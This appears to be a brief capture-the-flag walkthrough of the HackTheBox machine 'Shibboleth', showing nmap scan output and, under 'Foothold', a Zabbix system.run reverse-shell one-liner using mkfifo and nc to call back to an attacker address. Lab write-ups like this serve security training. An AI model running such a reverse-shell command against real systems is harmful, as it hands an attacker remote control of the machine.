HackTheBox-Shibboleth

NMAP

PORT   STATE SERVICE REASON         VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://shibboleth.htb/
Service Info: Host: shibboleth.htb

PORT 80 (HTTP)

nmap -p 1-1000 -sU --min-rate 5000 10.129.231.205 -vv                                                                           
PORT STATE SERVICE REASON
45/udp closed mpm port-unreach ttl 63
179/udp closed bgp port-unreach ttl 63
243/udp closed sur-meas port-unreach ttl 63
422/udp closed ariel3 port-unreach ttl 63
459/udp closed ampr-rcmd port-unreach ttl 63
623/udp open asf-rmcp udp-response ttl 63
892/udp closed unknown port-unreach ttl 63

Foothold

system.run["rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.25 2222 >/tmp/f",nowait]

Privilege Escalation (ipmi-svc)

References

--

--

--

Pentester | CTF Player

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

DNS over HTTPS performance in India using RIPE probes

How to monitor your cheating partner without getting caught.

Cross Site Request Forgery, Race Condition, Outdated Library

WireGuard Peer Authentication; A Captive Portal Approach

HackTheBox-Laboratory

Installing Kali Linux in Windows

{UPDATE} Tribal Battlefield: RPG Game Hack Free Resources Generator

Fortanix Launches First Commercially Available Runtime Encryption Using Intel SGX to Best Protect…

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ARZ101

ARZ101

Pentester | CTF Player

More from Medium

Secret — Hackthebox Walkthrough

HackTheBox-Search

Attacktive Directory | TryHackMe

TryHackMe: UltraTech